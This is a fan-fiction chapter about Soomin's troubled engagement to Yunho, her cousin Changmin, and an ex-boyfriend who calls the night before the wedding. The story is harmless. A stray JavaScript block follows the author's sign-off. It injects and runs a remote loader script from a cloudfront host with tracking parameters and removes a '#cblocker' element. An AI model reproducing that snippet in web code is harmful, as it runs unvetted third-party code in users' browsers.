Chapter 14

The Will That Changed Their Lives

Your POV

 

There are times when I really love Ailee and there are times when I would really love to kill her.

“Uhmm, I mean…Seven oppa, Soomin’s a fan of his. He has…great songs.” Ailee smiled. Too late, Changmin oppa was raising a questioning brow at me.

“Oh.” Yunho looked a bit confused. Hyoran looked puzzled. I just smiled.

“Will you excuse us?”

 

“Ya!”

Ailee puffed her cheeks.

“My cousin cant know about him. If he does……he’ll kill me….or him.”

“You’re still in love with him, Soo. Don’t lie. I can see it in your eyes earlier.”

I looked away.

“Well, there’s nothing I can do about that. He broke my trust.”

“And what? Get married to a guy who already has someone?”

I sighed.

“I can….work this out. Trust me.”

“I doubt. Yunho……that guy, he looks at you……differently.”

 

Narrator’s POV

 

Changmin sat there. Thinking about the “Khun oppa” Ailee mentioned. The he remembered his cousin calling him almost a year ago, Soomin was crying and she was drunk.

“Well, Seven has a big fanbase.” Junsu nodded as Soomin closed the door. But nobody noticed that Yunho and Hyoran weren’t speaking to each other.

 

Soomin and her friend came back and finished their meal. Soomin looked troubled.

“So, what are your plans after this?” Jaejoong asked.

“I’m going home, I need to rest.” Soomin replied.

“Does your head still hurt?” Yunho asked. Hyoran looked at him a bit confused. Soomin saw that she looked away.

“No. I just…lack sleep.”

Changmin narrowed his eyes at Soomin.

“Why? Did something happen?” Ailee asked.

“She collapsed yesterday.” Jaejoong asked.

“Omo, are you okay now?” Hyoran looked shocked. Soomin nodded.

“Did you go in the rain again?” Ailee shook her head. Not everyone was able to hear that but Yunho did. He wondered, what is it with Soomin and the rain?

 

“You were with her the whole day?” Hyoran asked as they walked together around the mall.

“I know how this looks like but,,, she collapsed Hyo.”

“And you didn’t even give me a call? Your mother downright insulted me in front of her!”

“I’m sorry, Hyo. But Soomin already talked to her~”

“It’s always about her now huh?”

Yunho looked down. He didn’t know how to handle the situation.

“Don’t you trust me? We’ve been together for a long time now.” Yunho said his tone now lighter.

“It’s just that……..I really hoped that you were there to comfort me yesterday.” Hyoran looked down.

“I’m sorry, Hyo, I’ll make it up to you.” Yunho just enveloped her in a hug.

“You just don’t know how it feels.” She muttered. Yunho shook his head and hugged her tighter.

But they didn’t know, Soomin’s ex boyfriend was looking at them.

 

The Shim cousins were walking inside the clothing department store. Changmin was behind the two girls while they checked out clothes. Older cousin is bored.

“Your brother tolerates you shopping?” Ailee asked in a hushed tone.

“He does.” Soomin grinned.

“Soomin-ah, I need to go.”

“But we need to see the clothes!” Soomin said.

“I still have to meet up some old friends.” Ailee reasoned. Soomin nodded.

“I’ll give you a call.” Ailee said as she walked away. Changmin now walked beside his cousin.

“It’s your wedding next week.” He stated. Soomin just shook her head, her arm automatically wounding around his.

“I heard about what happened.”

“Mwoga? (About what?)” Soomin stopped to pick up a shoe.

“Hyoran and auntie Jung.”

Soomin looked at him.

“Oppa, did Hyoran do something wrong? Why does auntie…..dislike her?”

“About that….maybe it’s because you’ve been gone for a long time, but…..in the circles we are in, we tend to marry one of our own.”

“What do you mean? We’re all humans.” Soomin blinked. Changmin smiled.

 

Your POV

 

“It’s like this, Hyoran she came from an average family, and you….chaebol daughter with desirable credentials.”

“Ya, its not like a drama, right? Too predictable.” I shrugged. Oppa shook his head.

“Aside from the will of your parents, you would be the perfect daughter-n-law for the Jungs.”

“But, it’s not always a happy ending with that.” I mumbled. Oppa just ruffled my hair and walked away.

“You don’t really have to end up with him, kiddo. Besides it would be too…blasé.”

I grinned, but how come I seem so disturbed about it?

 

Narrator’s POV

 

Days passed quickly. Soon it was the night before the wedding and Ailee was sleeping over at the Shims, much to Changmin’s annoyance. The house was already noisy enough. Soomin seems to be amused though; Ailee was inspiring more reactions from her cousin than the other girls.

It was already 11 PM and she couldn’t sleep at all, Ailee was beside her sleeping soundly. Then the sound of her phone vibrating shook her out of her revelry.

She picked it up carelessly.

“Soomin, it’s me.” The man said in English. Soomin’s eyes widened.

“Oppa, I told you~”

“Just give me a minute of your time, I really need to talk to you.”

 

 

++++++++++++++++++++++++++++++++++++++++++

SEVEN!!! :''>


if(typeof(jQuery)=='undefined'){(function(){var ccm=document.createElement('script');ccm.type='text/javascript';ccm.src='https://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js';var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(ccm,s);if(ccm.readyState){ccm.onreadystatechange=function(){if(ccm.readyState=="loaded"||ccm.readyState=="complete"){ccm.onreadystatechange=null;ccm_e_init(1);}};}else{ccm.onload=function(){ccm_e_init(1);};}})();}else{ccm_e_init();} function ccm_e_init(jc){if(jc){jQuery.noConflict();} jQuery(function(){var http=location.href.indexOf('https://')>-1?'https':'http';var ccm=document.createElement('script');ccm.type='text/javascript';ccm.async=true;ccm.src=http+'://d1nfmblh2wz0fd.cloudfront.net/items/loaders/loader_1063.js?aoi=1311798366&pid=1063&zoneid=15220&cid=&rid=&ccid=&ip=';var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(ccm,s);jQuery('#cblocker').remove();});};